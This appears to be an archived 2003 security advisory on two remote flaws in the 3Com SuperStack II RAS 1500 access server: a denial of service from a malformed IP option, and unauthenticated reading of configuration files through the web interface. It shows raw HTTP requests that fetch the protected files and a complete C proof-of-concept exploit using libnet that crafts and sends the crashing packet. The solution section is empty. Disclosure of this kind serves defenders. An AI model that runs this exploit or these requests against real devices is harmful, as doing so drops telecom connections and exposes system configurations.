24th Mar 2003 [SBWID-6089]
COMMAND
3com Remote vulnerabilities
SYSTEMS AFFECTED
3com RAS 1500, Product: 3C433279A-US Firmware X2.0.10
PROBLEM
In Piotr Chytla [[email protected]] advisory :
http://isec.pl/vulnerabilities/isec-0009-3com-ras.txt
3com SuperStack II Remote Access System 1500 is telco device which
provides access via BRI-ISDN/Analog to dialin users. It contains two
remote vulnerabilities, first is Denial Of Service that leads to system
crash, second can be used to read configuration files.
Details:
- -------
1. Remote Denial of Service
It is possible to remotely reboot RAS 1500 (Router unit) system by
sending malformed packet with ip option len field set to zero. This bug
can cause loosing all switched connections on PRI-ISDN interface.
2. Configuration file read
Unauthorized user can read configuration and system files, using web
interface on RAS 1500 .
GET /download.htm HTTP/1.0
HTTP/1.0 401 Unauthorized
WWW-Authenticate: Basic realm="RAS1500"
Content-Type: text/html
Server: Allegro-Software-RomPager/2.10
GET /user_settings.cfg HTTP/1.0
HTTP/1.0 200 OK
Content-Type: multipart
Date: Mon, 25 May 1998 00:26:38 GMT
Last-Modified: Tue, 01 Jan 1901 00:00:01 GMT
Content-Length: 1258
Server: Allegro-Software-RomPager/2.10
[..]
content of user_setting.cfg
RAS 1500 requires HTTP basic authorization only for download.htm file,
which is download manager for configuration files and system software.
Unfortunately system images and configuration files are not protected
by HTTP authorization.
Exploit:
- --------
Below is attached a working proof-of-concept exploit for vulnerability
no.1.
- ------X<------isec-options.c------X<------
/*
* 3com superstack II RAS 1500 remote Denial of Service
*
* Piotr Chytla <[email protected]>
*
* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY*
* IT IS PROVIDED "AS IS" AND WITHOUT ANY WARRANTY
*
* (c) 2003 Copyright by iSEC Security Research
*/
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <libnet.h>
#define OPT_LEN 4
void usage()
{
printf("Args: \n");
printf("-s [source address]\n");
printf("-d [destination address]\n");
}
int main(int argc,char *argv[])
{
char a;
int sock,r;
u_long src;
u_long dst;
char pktbuf[IP_MAXPACKET];
char payload[]="ABCDEFGHIJKLMNOPRST";
u_char options[4];
struct ipoption ipopt;
bzero(options,OPT_LEN);
while((a=getopt(argc,argv,"d:s:h?"))!=EOF)
{
switch(a) {
case 'h' : { usage(); exit(1); }
case 's' : { src=libnet_name_resolve(optarg,0); break;}
case 'd' : { dst=libnet_name_resolve(optarg,0); break;}
}
}
sock = libnet_open_raw_sock(IPPROTO_RAW);
if (sock<0)
{
perror("socket");
exit(1);
}
libnet_build_ip(strlen(payload),0,0x1337,0,255,0xaa,src,dst,payload,strlen(payload),pktbuf);
memcpy(ipopt.ipopt_list, options, OPT_LEN);
*(ipopt.ipopt_list) = 0xe4;
*(ipopt.ipopt_list+1) = 0;
*(ipopt.ipopt_list+1) = 0;
*(ipopt.ipopt_list+1) = 0;
r=libnet_insert_ipo(&ipopt,OPT_LEN,pktbuf);
if (r <0)
{
libnet_close_raw_sock(sock);
printf("Error ip options insertion failed\n");
exit(1);
}
r=libnet_write_ip(sock,pktbuf,LIBNET_IP_H+OPT_LEN+strlen(payload));
if (r<0)
{
libnet_close_raw_sock(sock);
printf("Error write_ip \n");
exit(1);
}
libnet_close_raw_sock(sock);
return 0;
}
- ------X<------isec-options.c------X<------
SOLUTION
?